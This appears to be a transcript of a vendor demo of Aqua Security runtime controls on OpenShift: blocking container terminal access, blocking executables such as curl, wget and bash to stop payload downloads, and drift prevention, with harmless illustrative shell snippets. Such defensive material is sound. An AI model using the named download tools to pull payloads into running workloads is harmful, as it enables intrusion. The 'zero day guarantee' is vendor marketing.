Okay? So if I now check that, enforce it, and then save the rule, then go back to OpenShift. Let me just come out of this terminal and go back into the terminal. And as you can see, this terminal connection has closed. If I try to reconnect to that terminal, it's not going to allow me in.
So I haven't changed the application in any way. This is a non-disruptive way of doing this. Okay? It does not disrupt anything.
All that's doing is it's preventing that capability.
So as a backstop and a guardrail, you wanna be able to prevent anybody from accessing a running live workload. And if there is a problem with that workload and you do need to enact a change, then you do that in dev and test, push it back through the pipeline where it's subject to all of that scrutiny, and then push that into live. So rather than fault and fix, we replace the bad code with good code.
Okay? And you need this policy in place here, and that would prevent anybody from accessing a running container. But let's just sit back a minute and think about what I just did.
I've just blocked any access to my running workloads. So when we think about the attack kill chain, if nobody can get access, then they can't download that payload.
So already in one simple control, I'm changing your world.
Okay. So let's go back then. But let's carry on, because remember, in Zero Trust, we assume breach. Let's assume that somebody can get around that control, so we'll untick it.
We'll go back into audit mode and we'll save the rule. We'll quickly go back just to test the theory here. Let's reconnect, and if we have a look, there you go. I'm back. And let's do a whoami, and we can see: I'm root. Okay. So we're back to where we were at the beginning. So now we've got this vulnerable and exposed situation. So what to do about that? If we think about the second policy then, we're talking about downloading the payload.
Now to do that, we can block curl, we can block wget, etcetera, all of those kinds of things. But we could also block bash, shell scripts, etcetera, any of these kinds of things. But just for a visual on this one, let's have a look at that.
So if I list out all the files in this folder, as you can see here, I can do that. Right? That's a Linux capability, and I've got no problem being able to run that. So if I go back up here, I can block it. Let me just find my control.
I think I've got it. Executables blocked. Where are you?
There we go.
So if I just block that command, add that rule, I need to enforce and save.
Go back and try and run that command again.
What you can see is the permission is denied. So there you go. So I can block any Linux capability, but let's move on quickly.
If I go back in here, let me turn off that.
And let me remove that because I'm gonna need that in a minute. Let me save that rule. The final thing that we're gonna look at from a control perspective is something that we call drift prevention. In order to do this, I need to save that rule. Let's just go back. So what you can see here is that we've got something called drift prevention.
Now drift prevention prevents executables that are not in the original image from running. Now this is patent number one for Aqua. This is the magic. Okay? We offer a guarantee to prevent a zero day.
This is how you do it. And what I mean by this is that when you build your container from your image, at that point, we take a hash of it.
We also take a date and time stamp at that point.
So remember, you're still in the pipeline here; you're not even live yet. When you push that into live, if somebody tries to execute a binary or a command after that point, we're going to block it. Let me prove that.
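The build-time hashing idea can be illustrated with a toy allowlist: snapshot a digest of every executable at build time, then refuse anything not on the list at run time. This is a sketch of the concept only, not Aqua's actual implementation; the `run_checked` helper and file names are hypothetical.

```shell
# Toy illustration of drift prevention via build-time hashing.
bindir=$(mktemp -d)
printf '#!/bin/sh\necho ok\n' > "$bindir/app"; chmod +x "$bindir/app"

# "Build time": record digests of every allowed binary.
sha256sum "$bindir"/* > allowlist.txt

# "Run time": a new binary appears after the build, i.e. drift.
printf '#!/bin/sh\necho pwned\n' > "$bindir/dropped"; chmod +x "$bindir/dropped"

# Only run a binary if its digest is on the build-time allowlist.
run_checked() {
  grep -q "$(sha256sum "$1" | cut -d' ' -f1)" allowlist.txt \
    && "$1" || echo "blocked: $1 not in original image"
}

run_checked "$bindir/app"       # on the allowlist: runs, prints ok
run_checked "$bindir/dropped"   # drifted: blocked
```

Because the decision keys on the content hash rather than the file name, even renaming a dropped binary to match an allowed one would not get it past the check.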
If we go back in here, let me clear the screen.
Let's have a look at a simple date object in Linux. Okay? So a simple capability there. If you type in date, you get the date.
What we don't have in here, so let's create a new object. Well, first of all, let's test it. It's called power date. Okay?
So is there a Linux capability called power date? No. There's not. So I'm gonna create that object there, and then we're gonna try and run it.
Now that wasn't part of the original image when I built and deployed this application. So it stands to reason that the date object exists, but power date does not. So let me create it first of all. I'm gonna take a copy of an existing binary file, so it's already executable.
I'm gonna take the date binary, as we just said, and copy it back into the binary folder, so it is executable.
I'm gonna call it power date.
Okay. Now at that point, I haven't created a drift event, but I have created a new object. Now I'm gonna run that power date. As we saw previously, it was not found. Now it is.
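The demo steps just described come down to a couple of commands; this sketch copies into the current directory rather than the system binary folder so it can run without root:

```shell
date                                                  # the standard binary works
powerdate 2>/dev/null || echo "powerdate: not found"  # no such command yet

# Copy the existing date binary under the new name, as in the demo.
# Copying a binary that is already executable keeps the execute bit.
cp "$(command -v date)" ./powerdate
./powerdate   # runs now, and under enforcement this is the drift event
```

Nothing about the new file is inherently malicious; it is blocked purely because it was not part of the image at build time, which is what makes the control effective against payloads that have never been seen before.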
So I've just created a drift event. Okay? And it allows me to do that. But if we go back to Aqua, and if we now enforce the policy down here, drift prevention, save that rule, go back to OpenShift, and rerun the command power date, what you can see is that my permission is denied. What that means is that once my application is deployed in that container, you can no longer run any subsequent binaries.
You cannot do anything else with this immutable live environment.